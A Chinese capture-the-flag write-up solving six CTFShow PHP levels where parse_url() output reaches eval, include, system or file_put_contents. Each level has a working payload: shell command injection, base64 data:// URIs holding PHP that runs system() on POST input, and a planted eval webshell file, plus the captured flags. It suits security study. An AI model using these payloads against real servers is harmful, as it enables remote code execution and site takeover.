CTFShow 平台:https://ctf.show/
第一关:
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-10 10:58:34 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); eval($data['host']);
Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');
也可以通过POST去执行命令获取,得到flag在 flag_is_here.txt下 cat查看一下即可。
?u=http://eval($_POST[a]); a=system("ls /");
ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}
第二关:
> <?php > > /* > # -*- coding: utf-8 -*- > # @Author: h1xa > # @Date: 2023-05-10 09:52:06 > # @Last Modified by: h1xa > # @Last Modified time: 2023-05-12 13:25:53 > # @email: h1xa@ctfer.com > # @link: https://ctfer.com > > */ > > $data = parse_url($_GET['u']); > include $data['host'].$data['path'];
Payload:
get: ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}
第三关:
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); include $data['scheme'].$data['path'];
Payload:
get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4= post:A=tac /_f*
ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}
第四关:
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:35 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); system($data['host']);
Payload:?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*
ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}
第五关:
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ extract(parse_url($_GET['u'])); include $$$$$$host;
Payload:
get: ?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d post: A=tac /_f1a*
ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}
第六关:
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); file_put_contents($data['path'], $data['host']);
Payload:
get: ?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php post: A=system("tac /_f1a*");
ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}
至此本周的周末大挑战全部通过,感谢大家的观看和官网的wp不一样(当时做完了没有及时写 现在补完啦,又是充实的一天😊!)
